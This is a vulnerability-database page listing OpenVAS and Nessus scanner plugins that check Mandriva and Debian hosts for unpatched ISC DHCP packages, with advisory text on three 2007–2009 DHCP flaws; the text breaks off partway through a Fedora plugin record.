DATABASE RESOURCES PRICING ABOUT US

{"id": "OPENVAS:66386", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Mandriva Security Advisory MDVSA-2009:312 (dhcp)", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:312.", "published": "2009-12-10T00:00:00", "modified": "2017-07-06T00:00:00", "epss": [{"cve": "CVE-2007-0062", "epss": 0.14376, "percentile": 0.95185, "modified": "2023-11-23"}, {"cve": "CVE-2009-1892", "epss": 0.07298, "percentile": 0.93366, "modified": "2023-11-23"}, {"cve": "CVE-2009-0692", "epss": 0.07614, "percentile": 0.93461, "modified": "2023-11-23"}], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=66386", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2007-0062", "CVE-2009-1892", "CVE-2009-0692"], "immutableFields": [], "lastseen": "2017-07-24T12:57:12", "viewCount": 8, "enchantments": {"score": {"value": 1.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2009:1154"]}, {"type": "cert", "idList": ["VU:410676"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2009-207", "CPAI-2009-406"]}, {"type": "checkpoint_security", "idList": ["CPS:SK42354"]}, {"type": "cve", "idList": ["CVE-2007-0062", "CVE-2009-0692", "CVE-2009-1892"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1833-1:FBD4D", "DEBIAN:DSA-1833-2:0E236"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2009-1892"]}, {"type": "exploitdb", "idList": ["EDB-ID:10015", "EDB-ID:9265"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8006538659CC6B98F93945B0BA919793"]}, {"type": "fedora", "idList": ["FEDORA:09D3210F8A0", "FEDORA:7B83E111241", "FEDORA:D298810F881"]}, {"type": "freebsd", "idList": ["C444C8B7-7169-11DE-9AB7-000C29A67389"]}, {"type": "gentoo", "idList": ["GLSA-200711-23", "GLSA-200808-05", "GLSA-200907-12", "GLSA-200908-08"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2009-1154.NASL", "DEBIAN_DSA-1833.NASL", "FEDORA_2009-8344.NASL", "FEDORA_2009-9075.NASL", "FREEBSD_PKG_C444C8B7716911DE9AB7000C29A67389.NASL", "GENTOO_GLSA-200711-23.NASL", "GENTOO_GLSA-200808-05.NASL", "GENTOO_GLSA-200907-12.NASL", "GENTOO_GLSA-200908-08.NASL", "MANDRIVA_MDVSA-2009-151.NASL", "MANDRIVA_MDVSA-2009-153.NASL", "MANDRIVA_MDVSA-2009-154.NASL", "MANDRIVA_MDVSA-2009-312.NASL", "ORACLELINUX_ELSA-2009-1136.NASL", "ORACLELINUX_ELSA-2009-1154.NASL", "REDHAT-RHSA-2009-1136.NASL", "REDHAT-RHSA-2009-1154.NASL", "SLACKWARE_SSA_2009-195-01.NASL", "SL_20090714_DHCP_ON_SL3_X.NASL", "SUSE9_12347.NASL", "SUSE9_12447.NASL", "SUSE_11_0_DHCP-090126.NASL", "SUSE_11_0_DHCP-090626.NASL", "SUSE_11_1_DHCP-090626.NASL", "SUSE_11_DHCP-CLIENT-090626.NASL", "SUSE_DHCP-5958.NASL", "SUSE_DHCP-5975.NASL", "SUSE_DHCP-6335.NASL", "SUSE_DHCP-6336.NASL", "UBUNTU_USN-543-1.NASL", "UBUNTU_USN-803-1.NASL", "UBUNTU_USN-803-2.NASL", "VMWARE_VMSA-2007-0006.NASL", "VMWARE_VMSA-2009-0014.NASL", "VMWARE_VMSA-2009-0014_REMOTE.NASL", "VMWARE_WS_SERVER_MULTIPLE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063469", "OPENVAS:136141256231064386", "OPENVAS:136141256231064387", "OPENVAS:136141256231064393", "OPENVAS:136141256231064421", "OPENVAS:136141256231064425", "OPENVAS:136141256231064434", "OPENVAS:136141256231064439", "OPENVAS:136141256231064447", "OPENVAS:136141256231064449", "OPENVAS:136141256231064458", "OPENVAS:136141256231064460", "OPENVAS:136141256231064515", "OPENVAS:136141256231064735", "OPENVAS:136141256231064756", "OPENVAS:136141256231064765", "OPENVAS:136141256231065322", "OPENVAS:136141256231065485", "OPENVAS:136141256231065690", "OPENVAS:136141256231065772", "OPENVAS:136141256231065863", "OPENVAS:136141256231066252", "OPENVAS:136141256231066386", "OPENVAS:1361412562310840379", "OPENVAS:1361412562310862173", "OPENVAS:1361412562310880710", "OPENVAS:1361412562310900694", "OPENVAS:59243", "OPENVAS:61438", "OPENVAS:63469", "OPENVAS:64386", "OPENVAS:64387", "OPENVAS:64393", "OPENVAS:64421", "OPENVAS:64425", "OPENVAS:64434", "OPENVAS:64439", "OPENVAS:64444", "OPENVAS:64447", "OPENVAS:64449", "OPENVAS:64458", "OPENVAS:64460", "OPENVAS:64486", "OPENVAS:64515", "OPENVAS:64735", "OPENVAS:64756", "OPENVAS:64765", "OPENVAS:65322", "OPENVAS:65485", "OPENVAS:65690", "OPENVAS:65772", "OPENVAS:65863", "OPENVAS:66252", "OPENVAS:840135", "OPENVAS:840379", "OPENVAS:862173", "OPENVAS:880710"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1136", "ELSA-2009-1154"]}, {"type": "osv", "idList": ["OSV:DSA-1833-1", "OSV:DSA-1833-2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:79651"]}, {"type": "prion", "idList": ["PRION:CVE-2007-0062", "PRION:CVE-2009-0692", "PRION:CVE-2009-1892"]}, {"type": "redhat", "idList": ["RHSA-2009:1136", "RHSA-2009:1154"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18039", "SECURITYVULNS:DOC:22168", "SECURITYVULNS:DOC:24273", "SECURITYVULNS:VULN:10073", "SECURITYVULNS:VULN:11009", "SECURITYVULNS:VULN:8174"]}, {"type": "seebug", "idList": ["SSV:11816", "SSV:11889", "SSV:14375", "SSV:2238", "SSV:66748", "SSV:67020"]}, {"type": "slackware", "idList": ["SSA-2009-195-01"]}, {"type": "suse", "idList": ["SUSE-SA:2009:037"]}, {"type": "threatpost", "idList": ["THREATPOST:1C22C4E02A8A1BDD89C6A3CCC2352014"]}, {"type": "ubuntu", "idList": ["USN-543-1", "USN-803-1", "USN-803-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2007-0062", "UB:CVE-2009-0692", "UB:CVE-2009-1892"]}, {"type": "vmware", "idList": ["VMSA-2007-0006", "VMSA-2009-0014", "VMSA-2009-0014.3"]}]}, "backreferences": {"references": [{"type": "centos", "idList": ["CESA-2009:1154"]}, {"type": "cert", "idList": ["VU:410676"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2009-406"]}, {"type": "checkpoint_security", "idList": ["CPS:SK42354"]}, {"type": "cve", "idList": ["CVE-2007-0062"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1833-1:FBD4D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2009-1892"]}, {"type": "exploitdb", "idList": ["EDB-ID:9265"]}, {"type": "fedora", "idList": ["FEDORA:7B83E111241"]}, {"type": "freebsd", "idList": ["C444C8B7-7169-11DE-9AB7-000C29A67389"]}, {"type": "gentoo", "idList": ["GLSA-200908-08"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_C444C8B7716911DE9AB7000C29A67389.NASL", "GENTOO_GLSA-200808-05.NASL", "REDHAT-RHSA-2009-1136.NASL", "SUSE_DHCP-6335.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231064425", "OPENVAS:64387", "OPENVAS:64458", "OPENVAS:66252", "OPENVAS:880710"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1136"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:79651"]}, {"type": "redhat", "idList": ["RHSA-2009:1154"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10073"]}, {"type": "seebug", "idList": ["SSV:66748"]}, {"type": "slackware", "idList": ["SSA-2009-195-01"]}, {"type": "ubuntu", "idList": ["USN-543-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2009-0692"]}, {"type": "vmware", "idList": ["VMSA-2007-0006"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2007-0062", "epss": "0.143760000", "percentile": "0.948230000", "modified": "2023-03-15"}, {"cve": "CVE-2009-1892", "epss": "0.072980000", "percentile": "0.929780000", "modified": "2023-03-15"}, {"cve": "CVE-2009-0692", "epss": "0.072480000", "percentile": "0.929600000", "modified": "2023-03-15"}], "vulnersScore": 1.0}, "_state": {"dependencies": 1700772881, "score": 1700773570, "epss": 0}, "_internal": {"score_hash": "42c583652f2cd1c742e4462c4d58fc13"}, "pluginID": "66386", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_312.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:312 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nInteger overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before\n3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build\n56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455\nand Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and\nACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528;\nallows remote attackers to cause a denial of service (daemon crash)\nor execute arbitrary code via a malformed DHCP packet with a large\ndhcp-max-message-size that triggers a stack-based buffer overflow,\nrelated to servers configured to send many DHCP options to clients\n(CVE-2007-0062).\n\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0\nbefore 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP\nservers to execute arbitrary code via a crafted subnet-mask option\n(CVE-2009-0692).\n\nISC DHCP Server is vulnerable to a denial of service, caused by the\nimproper handling of DHCP requests. If the host definitions are mixed\nusing dhcp-client-identifier and hardware ethernet, a remote attacker\ncould send specially-crafted DHCP requests to cause the server to\nstop responding (CVE-2009-1892).\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:312\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:312.\";\n\n \n\nif(description)\n{\n script_id(66386);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2007-0062\", \"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:312 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Mandrake Local Security Checks"}

{"nessus": [{"lastseen": "2023-12-08T14:57:20", "description": "A vulnerability has been found and corrected in ISC DHCP :\n\nInteger overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before 3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528; allows remote attackers to cause a denial of service (daemon crash) or execute arbitrary code via a malformed DHCP packet with a large dhcp-max-message-size that triggers a stack-based buffer overflow, related to servers configured to send many DHCP options to clients (CVE-2007-0062).\n\nStack-based buffer overflow in the script_write_params method in client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option (CVE-2009-0692).\n\nISC DHCP Server is vulnerable to a denial of service, caused by the improper handling of DHCP requests. If the host definitions are mixed using dhcp-client-identifier and hardware ethernet, a remote attacker could send specially crafted DHCP requests to cause the server to stop responding (CVE-2009-1892).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0 customers\n\nThis update provides fixes for this vulnerability.", "cvss3": {}, "published": "2009-12-04T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : dhcp (MDVSA-2009:312)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062", "CVE-2009-0692", "CVE-2009-1892"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:dhcp-client", "p-cpe:/a:mandriva:linux:dhcp-common", "p-cpe:/a:mandriva:linux:dhcp-devel", "p-cpe:/a:mandriva:linux:dhcp-doc", "p-cpe:/a:mandriva:linux:dhcp-relay", "p-cpe:/a:mandriva:linux:dhcp-server", "cpe:/o:mandriva:linux:2008.0"], "id": "MANDRIVA_MDVSA-2009-312.NASL", "href": "https://www.tenable.com/plugins/nessus/42998", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:312. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42998);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-0062\", \"CVE-2009-0692\", \"CVE-2009-1892\");\n script_bugtraq_id(35668, 35669);\n script_xref(name:\"MDVSA\", value:\"2009:312\");\n\n script_name(english:\"Mandriva Linux Security Advisory : dhcp (MDVSA-2009:312)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in ISC DHCP :\n\nInteger overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before\n3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5\nBuild 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5\nBuild 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3\nBuild 54075 and ACE 2 before 2.0.1 Build 55017, and Server before\n1.0.4 Build 56528; allows remote attackers to cause a denial of\nservice (daemon crash) or execute arbitrary code via a malformed DHCP\npacket with a large dhcp-max-message-size that triggers a stack-based\nbuffer overflow, related to servers configured to send many DHCP\noptions to clients (CVE-2007-0062).\n\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before\n4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers\nto execute arbitrary code via a crafted subnet-mask option\n(CVE-2009-0692).\n\nISC DHCP Server is vulnerable to a denial of service, caused by the\nimproper handling of DHCP requests. If the host definitions are mixed\nusing dhcp-client-identifier and hardware ethernet, a remote attacker\ncould send specially crafted DHCP requests to cause the server to stop\nresponding (CVE-2009-1892).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\n\nThis update provides fixes for this vulnerability.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dhcp-client-3.0.7-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dhcp-common-3.0.7-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dhcp-devel-3.0.7-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dhcp-doc-3.0.7-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dhcp-relay-3.0.7-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dhcp-server-3.0.7-0.1mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T16:20:16", "description": "Several remote vulnerabilities have been discovered in ISC's DHCP implementation :\n\n - CVE-2009-0692 It was discovered that dhclient does not properly handle overlong subnet mask options, leading to a stack-based buffer overflow and possible arbitrary code execution.\n\n - CVE-2009-1892 Christoph Biedl discovered that the DHCP server may terminate when receiving certain well-formed DHCP requests, provided that the server configuration mixes host definitions using 'dhcp-client-identifier' and 'hardware ethernet'. This vulnerability only affects the lenny versions of dhcp3-server and dhcp3-server-ldap.", "cvss3": {}, "published": "2010-02-24T00:00:00", "type": "nessus", "title": "Debian DSA-1833-1 : dhcp3 - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:dhcp3", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-1833.NASL", "href": "https://www.tenable.com/plugins/nessus/44698", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1833. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44698);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_bugtraq_id(35668, 35669);\n script_xref(name:\"CERT\", value:\"410676\");\n script_xref(name:\"DSA\", value:\"1833\");\n\n script_name(english:\"Debian DSA-1833-1 : dhcp3 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in ISC's DHCP\nimplementation :\n\n - CVE-2009-0692\n It was discovered that dhclient does not properly handle\n overlong subnet mask options, leading to a stack-based\n buffer overflow and possible arbitrary code execution.\n\n - CVE-2009-1892\n Christoph Biedl discovered that the DHCP server may\n terminate when receiving certain well-formed DHCP\n requests, provided that the server configuration mixes\n host definitions using 'dhcp-client-identifier' and\n 'hardware ethernet'. This vulnerability only affects the\n lenny versions of dhcp3-server and dhcp3-server-ldap.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1833\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the dhcp3 packages.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 3.0.4-13+etch2.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:dhcp3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"dhcp3-client\", reference:\"3.0.4-13+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"dhcp3-common\", reference:\"3.0.4-13+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"dhcp3-dev\", reference:\"3.0.4-13+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"dhcp3-relay\", reference:\"3.0.4-13+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"dhcp3-server\", reference:\"3.0.4-13+etch2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"dhcp-client\", reference:\"3.1.1-6+lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"dhcp3-client\", reference:\"3.1.1-6+lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"dhcp3-common\", reference:\"3.1.1-6+lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"dhcp3-dev\", reference:\"3.1.1-6+lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"dhcp3-relay\", reference:\"3.1.1-6+lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"dhcp3-server\", reference:\"3.1.1-6+lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"dhcp3-server-ldap\", reference:\"3.1.1-6+lenny2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:53:17", "description": "This update to the dhcp package includes fixes for CVE-2009-0692 and CVE-2009-1892. More information on these issues are available here:\nhttps://vulners.com/cve/CVE-2009-0692 https://vulners.com/cve/CVE-2009-1892 Note:\nCVE-2009-0692 had no security consequences on Fedora, thanks to the use of FORTIFY_SOURCE\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-08-26T00:00:00", "type": "nessus", "title": "Fedora 10 : dhcp-4.0.0-37.fc10 (2009-8344)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dhcp", "cpe:/o:fedoraproject:fedora:10"], "id": "FEDORA_2009-8344.NASL", "href": "https://www.tenable.com/plugins/nessus/40774", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8344.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40774);\n 